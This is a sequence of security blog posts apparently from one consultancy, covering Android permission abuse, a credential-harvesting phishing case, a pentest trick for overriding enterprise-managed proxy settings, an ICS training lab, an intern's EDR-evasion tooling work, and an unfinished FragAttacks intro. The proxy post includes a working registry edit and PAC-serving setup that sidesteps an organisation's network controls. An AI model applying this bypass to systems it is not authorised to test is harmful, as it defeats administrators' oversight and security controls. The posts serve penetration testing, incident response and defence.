Dangerous permissions grant access to data and resources outside of the application sandbox which could have an impact on the user’s data, the system or other applications. If an application requests a dangerous permission in its manifest, the user has to explicitly grant that permission to the application. On devices running Android 6.0 (API level 23) or above, the application has to request the permission from the user at runtime through a prompt. The user can then choose to allow or deny the permission, and can later revoke any granted permission through the application’s entry in the device settings. On devices running Android 5.1.1 (API level 22) and older, the system asks the user to grant all the dangerous permissions during installation. If the user accepts, all the permissions are given to the application; otherwise, the installation is cancelled. The android.permission.ACCESS_FINE_LOCATION permission, allowing the application to access the precise location of the device, is an example of a dangerous permission.

Permissions to be granted at install time in Android 5.1.1 and older
Permissions to be granted at runtime in Android 6.0 and above

Android maintains a list of all the permissions and their protection level.

Legitimate permissions usage

While permissions can be dangerous, as they allow applications to access sensitive data or resources, they are also essential for many features of a regular application. For example, the Google Maps application would not be able to work as intended if it was not granted permission to access the location of the device.

In this section, we will quickly go over a few permissions that are needed for an application to work properly. You will see that while the purpose of a permission is obvious most of the time, it is sometimes not clear at all.

Let’s start with a basic example: KMI Weather, a Belgian weather application.

The KMI Weather application (version 2.8.8) declares the following standard permissions in its manifest:

  • android.permission.ACCESS_COARSE_LOCATION
  • android.permission.ACCESS_FINE_LOCATION
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.INTERNET
  • android.permission.WAKE_LOCK
  • android.permission.VIBRATE

The ACCESS_COARSE_LOCATION and ACCESS_FINE_LOCATION permissions are dangerous permissions used by the application to automatically fetch the weather data for the city the device is currently in. The other permissions (ACCESS_NETWORK_STATE, INTERNET, WAKE_LOCK and VIBRATE) are normal permissions and are therefore granted automatically by the system.
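This kind of triage is easy to script. The Python sketch below lists the permissions declared in a decoded AndroidManifest.xml and flags a hand-picked, illustrative subset of dangerous ones; a real analysis should use Android's full protection-level list and a tool such as apktool to decode the binary manifest first:

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Illustrative subset only; Android's documentation has the full list.
DANGEROUS = {
    "android.permission.ACCESS_COARSE_LOCATION",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_SMS",
    "android.permission.READ_CALL_LOG",
    "android.permission.READ_PHONE_STATE",
}

def declared_permissions(manifest_xml):
    """Return the permissions declared via <uses-permission> in a decoded
    AndroidManifest.xml, split into (dangerous, other)."""
    root = ET.fromstring(manifest_xml)
    names = [e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")]
    dangerous = sorted(n for n in names if n in DANGEROUS)
    other = sorted(n for n in names if n not in DANGEROUS)
    return dangerous, other

manifest = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
</manifest>"""
print(declared_permissions(manifest))
# (['android.permission.ACCESS_FINE_LOCATION'], ['android.permission.INTERNET'])
```

Running this over the KMI Weather manifest would flag exactly the two location permissions as dangerous, matching the list above.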

We can see in this first basic example that each requested permission has an obvious purpose for the application. However, this does not mean that the application will not misuse these permissions, as we will see in the next section.

In some cases, it is not clear why an application would request a permission. Let’s take for example the well-known Spotify application.

The Spotify application requests the following permission in its manifest: android.permission.READ_PHONE_STATE. This permission allows the application to access the phone number, the device IDs, whether a call is active, and the remote number calling the device. Since Spotify is an application to listen to music, why on earth would it need such a permission?

As previously stated, the READ_PHONE_STATE permission allows the application to know whether a call is active or not. This is used by Spotify to pause the music when a call comes in, since users would not be happy if the music kept playing while they answer a phone call. In addition, the permission allows the retrieval of the device IDs, which are used by many applications for device binding and analytics purposes.

As was shown in the previous example, applications will sometimes request permissions which don’t appear to make sense in their context at first glance, but which are actually very useful for the application and the user’s experience.

The main problem with many permissions is that they cover many different functionalities. From the user’s perspective, it’s often very difficult to know what exactly a specific permission is used for. The Android team recognized this shortcoming and introduced a new API that allows the developer to explain why a specific permission is requested. This dialog can be shown before the user is asked for the permission:

Dialog explaining why the location permission is needed by the Twitter application

In addition to the explanation, Android regularly fine-tunes its permissions to prevent confusion. For example, the permission READ_CONTACTS originally also allowed the application to access the call and message logs. This was changed in Android 4.1, where new permissions were added and the READ_CONTACTS permission no longer gave access to the call and message logs.

Unfortunately, applications sometimes also request permissions which plainly do not make sense for the application or which are used ill-intentionally, as we will highlight in the next section.

Malicious permissions usage

In the previous section, we saw that applications sometimes request permissions which you would not think they would need at first glance while they have, in fact, a perfectly good reason to request them.

In this section, we will explore the other side of requesting permissions: malicious usage of permissions. We will explore four different scenarios, using real-world examples.

Data collection

The first scenario we will explore is probably the one most people have in mind when an application requests many permissions which don’t appear to make sense for it: an application harvesting data about its users.

We will illustrate this scenario by using a well-known social media application, Facebook.

It is common knowledge that Facebook harvests data about its users for advertising purposes. The data collected by Facebook ranges from personal information you provided to the platform to call log history and details about SMS messages. Here, we will focus on how Facebook gathered the latter.

Just like any other Android application, the Facebook application has to request permissions in order to access data and resources outside of the application sandbox. If we take a close look at the permissions requested by an older version of the Facebook Lite application, we will see, among others, the following permissions: READ_SMS and READ_CALL_LOG. The first permission allows the application to get details about the SMS messages that were sent and received, and the second permission allows the application to retrieve the call history of the device. While the READ_SMS permission could potentially be used to get multi-factor authentication codes, or to allow the application to act as an SMS application, these permissions also allow a lot of personal data to be collected by the application.

You might think that this is easily resolved, as you can just revoke the permission or not grant it in the first place, but before Android 6.0 this was not possible: if you wanted to use an application, you needed to grant all the requested permissions. As for later versions of Android, while it is indeed possible to deny such permissions, many users will blindly grant them out of ignorance of the consequences or simply out of convenience. Some applications may even refuse to work without a specific permission.

In addition to the above, Facebook uses an alternative way of collecting user data: other applications. There are many instances of applications sharing data with Facebook. Should you grant a sensitive permission to such an application, your data might be shared with Facebook even if you carefully denied the related permissions to Facebook in the first place. As shown by a report from Privacy International, many applications share the data they have on you with Facebook by using the Facebook SDK.

Collecting data for advertising purposes is arguably a malicious usage of application permissions. Whether you are against this kind of practice or not, it is easy to agree that collecting such amounts of data, even for legitimate purposes, poses a threat to the user’s privacy and might even impact entire communities. A great example of this is the Facebook-Cambridge Analytica data scandal, where sensitive user data was leaked and supposedly used to influence elections.

Note that in the case of Facebook, their business model entirely relies on this data collection and on sharing it with advertisers, which is now public knowledge. In addition, most permissions requested by Facebook are tied to features of their applications. For example, as already mentioned, the READ_SMS permission allows Messenger to be used as an SMS application, while having access to the location allows Facebook to link your images to specific locations, or to share your location with your friends if you want to.

There are many other applications, such as adware, which operate in a similar way, but arguably with more malicious intentions. Such applications will typically request a lot of permissions which will be used to gather data about the user, that will be shared with advertising networks in order to show highly targeted advertisements. More often than not, the requested permissions will have no other purpose than to gather data about the user.

Malware-like applications

The second scenario we will take a look at is applications requesting many permissions and using them to exploit the user or the device.

A good example of this is the Joker malware. Joker will subscribe the user to paid services without the user’s consent by leveraging dangerous permissions granted to the application. This is obviously not something you would want as you will get charged for a service to which you subscribed unknowingly.

The Joker malware will request the READ_PHONE_STATE permission to obtain the user’s phone number and then uses it to initiate subscriptions to paid services. Usually, the paid services will require a confirmation code sent to the provided phone number. The malware will therefore also request the READ_SMS permission to retrieve the confirmation code from the received SMS and ultimately confirm the subscription. The user will then be charged monthly for the service. You can take a look at the in-depth analysis of Joker for more information.

This is far from the only example of how permissions can be used maliciously. Another example would be an application that requests the SEND_SMS permission and sends SMS messages to premium numbers (e.g. FakeInst), or an application accessing the SD card and exfiltrating the user’s documents. Other malware-like applications will ask for very limited permissions and rely on those to exploit other legitimate applications with more extensive permissions to perform their malicious actions.

Luckily, Google usually reacts quickly to such applications and removes them from the Google Play Store, preventing further users from falling victim to them. However, despite these fast reactions, many users will have already downloaded the malicious applications and fallen victim to them.

Abuse of legitimate permissions

In this third scenario, we will take a closer look at applications which do require specific permissions to work properly, but which will also abuse said permissions in ways that would not be expected from the users.

An example of such an application would be an SMS application, requiring the permissions to read and send SMS messages, which abuses these permissions to send SMS messages to premium numbers or to intercept multi-factor authentication tokens, as discussed in this article. The read and send SMS permissions are legitimate permissions for an SMS application, so users will naturally grant them. However, users do not expect the application to misuse these permissions the way it does, making them pay for services they never subscribed to, or retrieving data that allows the malicious actor to access the user’s accounts.

In such a scenario, the only thing the user can really do to protect their privacy is to stop using the application. This is, however, not always desirable, as the application in question may be extremely convenient. The choice then boils down to whether or not the user is willing to sacrifice their privacy to enjoy the convenience of the application.

In practice, such applications are not that common. Most of the time, malicious applications will simply request many permissions, even ones that are not legitimate for the application. In addition, malware authors rarely put significant effort into making an application appear legitimate. Instead, they will typically invest in hiding the application from the eyes of the user, or provide very limited features and attempt to hide the malicious behavior in some other way.

Abusing permissions of other applications

The last example of malicious usage of permissions is that of a malicious application which will abuse the permissions of a legitimate application on the device by exploiting its exposed features.

If a legitimate application requests dangerous permissions and then exposes a feature that uses such a dangerous permission to the system, it allows any other application installed on the device to use the permission without having to request it. Let’s take for example a file explorer application with the permission to read files on the external storage. If it also exposes a provider that lets another application request the content of a given folder or file, it essentially allows other applications to read files on the external storage, even if they do not have the READ_EXTERNAL_STORAGE permission. This is known as the confused deputy problem.

A good example of this issue would be the Google and Samsung Camera applications, which were identified as vulnerable to such an attack in 2019. The applications exposed an unprotected feature that allowed another application to take pictures or videos through the Camera application. These pictures were written to the SD card, which is typical for camera applications. A malicious application could request access to the user’s SD card, something that is not suspicious by itself, send an Intent to the vulnerable app and then extract those images. Even worse, if geolocation was enabled while taking the pictures, the application could extract that information from the images and essentially track the user without needing the LOCATION permission.

Google Camera application

Unfortunately for the users, there’s nothing that can be done to prevent these kinds of issues, apart from hoping that the developers correctly protected any exposed features of their application.


Application permissions are essential for almost every application to work properly. However, as we saw in this blog post, the permissions can also be abused to collect data or to create malware applications. It is therefore important for the users to be able to tell when a permission makes sense for an application and when it does not.

Developers should provide users with a clear reason why the application requests the permissions it does in order to help the user decide. However, even when this is the case, legitimate permissions on legitimate applications can be misused, and the decision comes down to whether or not the user is willing to risk their privacy for the convenience of using the application as intended.

About the authors

Simon Lardinois

Simon Lardinois is a Security Consultant in the Software and Security Assessment team at NVISO. His main area of focus is mobile application security, but he is also interested in web security and reverse engineering. In addition to mobile application security, he also enjoys developing mobile applications.

Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software and Security assessment team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff.

Credential harvesting and automated validation: a case study

26 August 2021 at 08:41

During our incident response engagements, we very frequently come across phishing lures set up to harvest as many credentials as possible, which will likely be sold afterwards or used in follow-up attacks against an organization (or both). While many of these credential harvesting attacks follow the same pattern, from time to time we stumble upon something new.

Over the last few months, we worked on several phishing incidents that followed this pattern:

  1. Phishing mail received by user where the sender is a known contact (who was compromised earlier)
  2. Phishing mail contains link to WeTransfer website where an HTML page can be downloaded
  3. HTML page displays Microsoft Office 365 login page
  4. User enters their username and password
  5. Upon clicking the “Sign In” button, a script sends the entered username and password to a PHP page hosted on a likely compromised website
  6. The credentials are automatically checked for validity
  7. User always receives an error message “Incorrect password, verify your 365 password and sign in again”

While the majority of this attack seems rather standard, the automatic validation of the entered passwords by the script on the compromised website is something we had not seen before.

Detailed description of the credential harvesting attack

The initial phishing mail is sent to the user from a trusted source, someone they have interacted with before. This is something we see happening very frequently in these credential harvesting types of attacks: once attackers gain access to a user’s mailbox, they will send a new phishing mail to all users in the “Suggested Contacts” list (this list contains the e-mail addresses of people the user has interacted with before). This creates a sense of legitimacy with the recipient of the phishing mail, as it is coming from someone they know and have interacted with before.

The phishing mails themselves are typically tailored to resemble an invoice or document from the sender’s company (containing the company name in the subject). The body of the e-mail, however, is not that well crafted and typically only contains a reference to the document to be downloaded from an online portal or, as was the case here, to a file sharing platform.

From the file sharing platform, the user can download the attachment, in this example, this was an HTML Page where the name of the file contained the company name of the (compromised) sender of the phishing mail.

HTML page download from WeTransfer

After downloading and opening the HTML page, the targeted user would receive a login screen for Office 365 – a screen we are all familiar with:

Local phishing HTML page

Interesting to note here is that this is a static page: if your organization has configured the authentication screen to show your company logo after you enter your e-mail address, this is not reflected in this phishing example.

Local phishing page – password entry

So far, this looks fairly standard for a credential harvesting attack. When clicking the “Sign In” button, a script is used to send the entered username and password to a PHP page on a (likely compromised) server:

Script sending credentials to PHP script

Regardless of whether the user entered correct or incorrect credentials, the phishing form would always indicate that incorrect credentials were entered.

Failed authentication is always shown

Now, looking into our Office 365 authentication logs, we immediately see that someone tried to authenticate as the user who entered the credentials in the phishing form. This authentication attempt happens the moment you click the Sign In button on the local HTML phishing page, indicating there is no human interaction.

Authentication attempts logged in Office 365 authentication logs
Authentication details

As an attack like this could potentially also be used to bypass multi-factor authentication (authentication is performed from another system using the information provided by the user), we set up a test account on which MFA was enabled (with no support for legacy authentication protocols). A quick test showed that the attackers did not implement a fallback mechanism that would allow them to pass along the MFA code as well.

Authentication failure with MFA enabled
Authentication details

A few interesting observations to this attack:

  • The authentication attempt happens instantly, there is no human interaction
  • The IP address from where the authentication is performed is the IP address of the likely compromised website where the PHP script is hosted to which the username and credentials are posted
  • The authentication attempt is performed via IMAP4 with User Agent “BAV2ROPC” (a legacy protocol is used here, likely in an attempt to bypass multi-factor authentication)
  • It appears that the script on the likely compromised server maintains a key/value store of previously entered credentials: it will only attempt authentication with a given username and password combination once. When a new password is entered for the same e-mail address, another authentication attempt is performed. This is likely done to avoid too many failed authentication attempts showing up in the logs or locking out the user.
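These observations translate naturally into a simple hunting query. The Python sketch below illustrates the idea on exported sign-in events; the field names (clientAppUsed, userAgent) mirror Azure AD sign-in log properties, but should be adapted to your actual export format:

```python
SUSPICIOUS_AGENT = "BAV2ROPC"

def flag_legacy_auth(events):
    """Return events matching the pattern observed in this case:
    legacy-protocol (IMAP4) logons using the BAV2ROPC client string."""
    return [e for e in events
            if e.get("clientAppUsed") == "IMAP4"
            and SUSPICIOUS_AGENT in e.get("userAgent", "")]

# Illustrative sample events, not a real log export
events = [
    {"user": "alice", "clientAppUsed": "Browser", "userAgent": "Mozilla/5.0"},
    {"user": "bob", "clientAppUsed": "IMAP4", "userAgent": "BAV2ROPC"},
]
print(flag_legacy_auth(events))  # only the bob/IMAP4 event is flagged
```

Combined with the source IP of the compromised web server, this quickly surfaces every account whose credentials were validated by the attackers.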

Key takeaways

Attackers who are after credentials are, just like our defenses, constantly evolving. In an attack like this one, where credentials are automatically checked via a script, the attacker does not need to be present all the time, but can come back to the compromised web server they are abusing and collect a list of usernames and passwords which are verified to be correct.

It is highly recommended to enable multi-factor authentication on your user accounts and deny legacy authentication protocols from being accepted by your Office 365 infrastructure. In the majority of cases handled related to phishing, the attack would have been unsuccessful if MFA was enabled.

Michel Coene

Michel is a senior manager at NVISO where he is responsible for our CSIRT services with a key focus on incident response, digital forensics, malware analysis and threat intelligence.

Proxy managed by enterprise? No problem! Abusing PAC and the registry to get burpin’

17 August 2021 at 14:25

As penetration testers, we sometimes have to perform web application security assessments from our customer’s computers instead of our beloved machines. When this happens, we can face different challenges in order to have a working test setup. We will most probably have very limited permissions, which can block us from installing applications or modifying proxy settings. We recently encountered such a situation during an engagement and we wanted to share our solution.

This blog post shows how you can still proxy a target application through Burp even if the proxy settings are managed by the enterprise.

That’s easy! We just use Burp’s internal browser!

You are absolutely correct! Burp introduced an internal browser in 2020 which is automatically preconfigured with the correct proxy settings. Problem solved! Install Burp, launch the browser and you’re good to go.

However, what if that’s not possible? When you receive a customer’s computer, you can be pretty sure you won’t be able to install Burp through the installer since you’re typically not allowed to run executables or to install applications. Luckily, Burp has a standalone version as well, which only requires Java. So a quick Java check later, and we’re good to go, right?

Checking Java Version

Well, no. In this case, Java is installed, but the Java version is too old to support a recent version of Burp with a built-in browser. We can still use an older version of Burp, but we will have to find an alternative solution to our proxy settings problem. There are various ways to configure a proxy, so let’s take a look.

Common proxy settings

Several possibilities exist to proxy traffic through Burp. Normally, you could simply modify the system’s proxy settings and these settings would automatically be picked up by Edge and Chrome. However, in our setup, this is unfortunately not possible because the settings are managed by the enterprise:

System Proxy Settings

The proxy settings are set in the Automatic proxy setup section, by using a PAC setup script. As the proxy settings are managed by the organization, we cannot edit them, and without admin privileges we cannot modify the local group policy to grant us access to the system proxy settings.

An alternative solution is to use Firefox’s built-in proxy settings. Firefox has its own settings panel where you can choose to either use the system settings or configure a proxy yourself. Firefox was installed on the system, so we thought the end was in sight:

Greyed-Out Firefox Proxy Settings

Strangely enough, Firefox doesn't allow us to modify the proxy settings either. It turns out access to some Firefox settings can be restricted through a lock preferences file located in Firefox's installation folder:

Firefox Local Settings Location
local-settings.js Content
Snapshot of mozilla.cfg

As these files are all located in the installation folder of Firefox, in Program Files, admin privileges are required to edit these settings. Again, we ended up blocked and unable to change any of the proxy settings, either system wide or in Firefox itself.
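For reference, a lock-preferences setup of the kind shown in the screenshots above typically looks like the following sketch. The file names (local-settings.js, mozilla.cfg) follow Firefox's autoconfig conventions; the proxy URL is a placeholder, not the value from this engagement:

```javascript
// local-settings.js (in Firefox's install folder, under defaults/pref/):
// tells Firefox to load a locked configuration file at startup.
pref("general.config.filename", "mozilla.cfg");
pref("general.config.obscure_value", 0);

// mozilla.cfg (in the install folder root; its first line must be a comment):
// lockPref() fixes the value and greys the setting out in the UI.
// network.proxy.type 2 = "use automatic proxy configuration URL".
lockPref("network.proxy.type", 2);
lockPref("network.proxy.autoconfig_url", "http://proxy.example.com/proxy.pac");
```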

Un-PAC-ing the mystery behind system proxy settings

As these two easy solutions were unsuccessful, let's analyze in more depth how the system proxy settings actually work and where they might be subverted.

In the system proxy settings, we had seen it was using Automatic proxy setup, delivered via a PAC file through HTTP. What if we manage to deliver a modified PAC file, one with our own proxy settings?
First things first, let’s download the original PAC file and take a look. The PAC file is a simple text file and we can change the default proxy settings to our Burp IP and port:

Altered PAC File
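As a sketch, a minimally altered PAC file that routes everything to Burp could look like this. The listener address 127.0.0.1:8080 is an assumption matching Burp's default; the organization's original file will contain its own routing logic and real upstream proxy:

```javascript
// Minimal altered PAC file: send every request to the local Burp listener.
// 127.0.0.1:8080 is Burp's default proxy address (assumed here).
function FindProxyForURL(url, host) {
    return "PROXY 127.0.0.1:8080";
}
```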

We now need to make the system download our PAC file instead of the one set by the organization.

The URL for the PAC file is shown in the system proxy settings, but where is this URL actually stored? Most probably in a registry key! By searching for the URL of the PAC file inside the registry editor, we can see some hits. One of the hits was found in the Internet Settings, which seems like a very good candidate. And even better, these keys can be edited without admin rights! This means we can modify it to anything we want, so why not set it to something like file://C:\temp\BR-Proxy.pac?

Some online research showed this would not work: Internet Settings relies on the WinHTTP proxy service to retrieve the file stored at the AutoConfigURL, which means protocols such as ftp:// or file:// are not supported. Only the http:// and https:// protocols can be used.

So let's set the variable to a local address, such as http://

PAC File URL Registry Key
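A sketch of that registry change using the built-in reg utility. The AutoConfigURL value lives under the current user's hive, so no admin rights are needed; the local URL (loopback address, port 8080, BR-Proxy.pac) is an assumption based on the setup described in this post:

```shell
:: Hypothetical example: point the PAC URL at a server we control locally.
:: HKCU\...\Internet Settings holds the per-user AutoConfigURL value.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /t REG_SZ /d "http://127.0.0.1:8080/BR-Proxy.pac" /f
```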

As a result of this modification, we can now see the system proxy has a script address set to the one we have set in the registry key:

Altered System Proxy Settings

We have changed the URL of the automatic setup to a URL we can potentially control. We now need a local server that will deliver our custom PAC over HTTP. As Java is installed on the system, a quick online search gives us a simple HTTP Java WebServer (https://github.com/pciporin25/Simple-HTTP-Server/blob/master/WebServer.java) to serve our PAC file on http://

import java.net.*;
import java.io.*;
import java.nio.file.*;
import java.nio.charset.*;

public class WebServer {
        public static void main(String args[]) {
                int serverPort = 8080;
                try {
                        ServerSocket listenSocket = new ServerSocket(serverPort);
                        System.out.println("Server listening on port " + serverPort + "...");

                        while (true) {
                                Socket clientSocket = listenSocket.accept();
                                InputStream input = clientSocket.getInputStream();
                                BufferedReader br = new BufferedReader(new InputStreamReader(input));

                                String request = br.readLine();
                                String[] reqArray = request.split(" "); // ['GET', '/index.html', 'HTTP/1.1']

                                String filePath = reqArray[1].substring(1); // index.html (or other path): remove the '/'
                                if (!filePath.isEmpty())
                                        loadPage(clientSocket, filePath, br);
                        }
                } catch (IOException e) {
                        System.out.println("Listen: " + e.getMessage());
                }
        }

        public static void loadPage(Socket clientSocket, String filePath, BufferedReader br) {
                try {
                        PrintWriter output = new PrintWriter(clientSocket.getOutputStream());
                        File file = new File(filePath);
                        if (!file.exists()) {
                                output.write("HTTP/1.1 404 Not Found\r\n" + "Content-Type: text/html" + "\r\n\r\n");
                                System.out.println("File does not exist. Client requesting file at: " + filePath);
                        }
                        else {
                                output.write("HTTP/1.1 200 OK\r\n" + "Content-Type: text/html" + "\r\n\r\n");
                                byte[] fileBytes = Files.readAllBytes(Paths.get(filePath));
                                String fileString = new String(fileBytes, StandardCharsets.UTF_8);
                                output.write(fileString); // send the file content to the client
                                System.out.println("Finished writing content to output");
                        }
                        output.flush();
                        clientSocket.close();
                } catch (IOException e) {
                        System.out.println("Connection: " + e.getMessage());
                }
        }
}
With this setup, the system will now retrieve the PAC file to check which system proxy to apply, and it will then proxy the traffic through our Burp.

As a last step for the setup to fully work, we need to configure an upstream proxy server in Burp that forwards the traffic to the default proxy defined in the original PAC file.

The traffic will now pass through Burp, up to the real enterprise proxy, and we finally can proceed with the actual assessment!


The main enabler for this setup was that the registry key holding the PAC file URL is writable without elevated privileges.

To prevent such a setup, we recommend ensuring the script address registry key cannot be edited by low-privilege accounts, as it allows bypassing the enterprise proxy settings. Moreover, we recommend delivering the PAC file over HTTPS instead of HTTP, as the latter could be exploited in a Man-in-the-Middle attack to alter the content of the PAC file without having to change the script address registry key value.

Thomas Grimée

Thomas Grimée is a Senior Security Consultant in the NVISO Software and Security Assessment team. He is managing different penetration testing projects for various customers, and mainly performs web application and red teaming engagements.

Building an ICS Firing Range – Part 1 (Defcon 29 ICS Village)

18 August 2021 at 07:15

An Incident in a Water Treatment Plant

At the beginning of this year, the supposed hack of a water treatment plant in Florida made some waves. While we often read about newsworthy hacks, this one stood out due to the apparent simplicity of the compromise and the severe consequences it could have had. So, what had happened?

As is often the case, many assumptions made during investigations of such incidents must be taken with a grain of salt. What is confirmed, though, is that an individual directly connected to an internet-facing operator workstation via TeamViewer. This enabled them to remotely control the system and dramatically increase the level of sodium hydroxide in the water, with severe consequences for the health of consumers. Luckily, an operator spotted this and could revert the changes. It must also be noted that, reportedly, other controls existed that could have prevented sodium hydroxide from actually leaking into the drinking water.

Why does this incident not come as a big surprise? More often than not in the world of Operational Technology (OT), you find personnel with a degree in Engineering. They do great work in their field of expertise but might lack insight into common security topics relevant to Information Technology (IT). After all, their priority is to make things work and keep them running. Such an engineer might therefore approach problems in a more pragmatic way than someone who has spent their fair share of time in IT and faced its various security issues.

Security Requirements: OT vs IT

The major differences between the two worlds, OT and IT, become evident when you look at their specific security requirements. While in Information Technology confidentiality is, in most scenarios, paramount before integrity and availability, it is the other way around in OT. If a critical system in a water treatment plant becomes unavailable, things can go downhill fast.

Availability has higher priority in OT

Needless to say, for a plant operator directly accessing the workstation via TeamViewer is a lot more convenient and efficient than having to jump through hoops of security controls.

While the incident in Florida was not caused by a security flaw in OT infrastructure per se, it illustrates how pragmatism can clash with security awareness.

The incident in Florida is not an isolated case. Be it the incidents of the Ukrainian power grid, ransomware attacks in Hospitals or Transportation around the globe or the sophisticated attack against a power plant in Saudi Arabia, it begs the question: Did nobody test the security controls of the critical infrastructure?

Security Testing in OT

First and foremost, most OT environments are years old and were not designed with security in mind; any security controls therefore need to be built on top. One possible answer to the question why security controls have not been tested or implemented is: availability. Implementing a security control will restrict access in some form. To ensure that the control works as intended and cannot easily be circumvented, testing is required. Testing of such security controls is generally an intrusive act and can sometimes be destructive, even against IT infrastructure. Let's not forget: during most security tests, you want to provoke a reaction from a system by supplying data it did not expect, or send possible triggers in order to find out more about a service. If the system cannot properly handle this, it might fault. That is why for critical IT systems you want any active testing to be conducted out of business hours or against a test environment. But this is not feasible in a factory or plant that runs 24/7.

Naturally, if you decided to conduct a security test of your OT infrastructure anyway, you'd want to hire a team of security professionals who also bring the required awareness and sensitivity of the OT world. And this is where OT security testing becomes a chicken-and-egg problem.

Training of ICS Security Experts

Fully functioning 3D printed model of a bascule bridge

A lot of those security testers, pentesters and red teamers grew up in the IT world. They have not had the chance to actively test the infrastructure in a steel producing factory or audit segmentation firewalls in a water treatment plant. And let’s be honest, would you want to be the first one to give them the chance?

A solution to all this is to give them the tools and means to acquire the skills and awareness well before they are on the factory floor.

This is where we began our journey of creating a training environment. The primary motivation of our firing range, comprised of virtualized IT infrastructures and real OT components, was to internally train the Red Team on how to safely approach OT level infrastructure. Secondly, it allowed our Blue Team to detect and investigate those attacks. Lastly, having a working OT infrastructure for testing purposes opened up all sorts of possibilities for isolated OT component testing and further research into tooling, vulnerabilities and methodologies.

Our lab is a 120 by 80 cm, 3D-printed bascule bridge controlled by several Siemens PLCs and HMIs, with fully virtualized enterprise and SCADA networks. It is mobile and can thus be easily transported between sites. It is designed to cover different training scenarios, depending on individual needs.

Recently, we presented our Firing Range at the Defcon 29 ICS Village. Check out the video below.

In this series of blog posts, we’ll discuss our development process of the firing range in more detail, present the rationale behind decisions made and present the challenges we faced along the way.

This series of posts is continued in part 2!

Interview with an NVISO Intern – Writing Custom Beacon Object Files

5 August 2021 at 05:48

During the first months of this year, Sander joined our ‘Software Security & Assessments’ team as an intern and worked on writing Custom Beacon Object Files for the Cobalt Strike C2 framework.

Below you can find out how it all went!

Who are you?

My name is Sander, @cerbersec on Twitter. I'm a student of Information Management & Cybersecurity at Thomas More, and I've had the opportunity to do an 8-week internship in NVISO's Red Team.

How did you discover NVISO?

NVISO co-organizes the Cyber Security Challenge Belgium and there I noticed they had open internship positions for IoT projects. I’ve always been passionate about offensive security and red teaming. Needless to say, I was pleasantly surprised when NVISO offered an internship position in a red team where I’d be working on research for new tooling.

What was it like to be an intern at NVISO?

With the ongoing COVID-19 pandemic, the internship would be fully remote. This meant that meeting colleagues would be slightly more difficult, and the entire internship required a high degree of autonomy. Regardless, I felt very welcome from the start. I had a kick-off meeting with my mentors where I could ask any questions I had and received a nudge in the right direction to get me started.

The overall atmosphere was very pleasant and light-hearted, they encouraged me to ask questions, but also made sure I did my own research first. I learned a lot just from sharing and discussing potentially interesting topics and techniques we came across, not all of them necessarily pertaining to my internship topic. Working with like-minded people really motivated me to push myself.

As my project developed over time, I got the opportunity to present my work during lunch to colleagues from different teams and even from different countries! NVISO regularly organizes Brown Bag sessions during lunch for anybody to attend. During these sessions an NVISO expert presents their insights into a currently hot topic. As an intern, I also got the opportunity to present my own project during lunch. My presentation was met with great feedback and opened up a discussion on the presented techniques, their strengths and possible shortcomings.

On my final day I had a chance to see the office and meet my mentors and colleagues in person. NVISO has a shared open space and after a tour of the office and some quick work, we went for lunch together, which gave me a chance to get to know my mentors in real life and share my experience as an intern. To finish the day, I demoed my project and discussed my findings.

What was your internship project?

When I first met my mentors Jonas and Jean-François, they came up with a variety of topics that would directly contribute to the daily operations of the different red teams. This allowed me to choose topics I’d like to work on which would be in line with my skills, experience, and interests. Little did I know I picked one of the toughest of them all.

I’ve always had a secret love for coding and recently ventured into malware analysis, which turned out to be a great stepping stone towards writing malware. For 8 weeks I would be working on custom process injection techniques and investigate alternative methods to exfiltrate C2 traffic since Domain Fronting is no longer a viable option (at least not “legitimately” via Azure).

My main task consisted of writing custom Beacon Object Files (BOFs) for the Cobalt Strike C2 framework, to perform process injection and bypass Endpoint Detection and Response (EDR) and Anti-Virus (AV) products by using direct syscalls. As my secondary task, I researched different protocols and techniques like DNS over HTTPS (DoH), Domain Borrowing and Software as a Service (SaaS) for exfiltrating C2 traffic.

Working with the Windows Native API was definitely a challenge at first, as there is very limited documentation available, debugging code that is not fully compiled into an executable is a challenge on its own, and use of undocumented functions requires a lot of trial and error to get right. I wrote most of my code in C, which took some time to relearn as I only had limited experience with the language before I started. During development it quickly became apparent that relying on documentation only wasn’t going to get me the results I needed, so I had to break out a debugger and dive into the assembly instructions to figure out where things were going wrong.

As a result, I was able to provide BOFs making use of various injection techniques and ported the recently disclosed Domain Borrowing technique to CobaltStrike (https://github.com/Cerbersec/DomainBorrowingC2).

What is your conclusion?

Overall, I had a great time and got to know some very cool people. I got to explore the highly technical concepts behind malware and at the same time translate this into an easily understandable format so a less technical audience could still understand my work. I’m excited to keep developing these skills and hopefully return for a second internship very soon.

Navigating the impact of Wi-Fi FragAttacks: users, developers and asset owners

30 June 2021 at 13:06

In short: Wi-Fi devices are affected by a series of new attacks on the Wi-Fi protocol, known as FragAttacks and released in May 2021. These attacks have complex requirements and impacts. We attempt to shed some light on those and provide some guidance for users, developers and asset owners (integrators or IT staff).

FragAttacks in a nutshell

FragAttacks are a new collection of vulnerabilities affecting Wi-Fi devices, discovered and released by Mathy Vanhoef in May 2021. In this post, we will not dive into the technical details of the attacks – if you are interested, we highly recommend Mathy’s paper, which is an excellent technical read and does a great job of explaining the nitty-gritty details.

Instead, we will focus on the exploitation requirements and concrete impact of these vulnerabilities, hoping to help users, developers, integrators and IT staff understand them better and take appropriate actions. If you are only interested in the “take home” message and actionable points feel free to skip to the Conclusion and Aftermath sections 🙂

No vulnerability is complete without its own logo (Credit: https://www.fragattacks.com/)

Attack requirements and impacts

Off the top, it is important to understand that FragAttacks are a collection of vulnerabilities that can be divided in two groups:

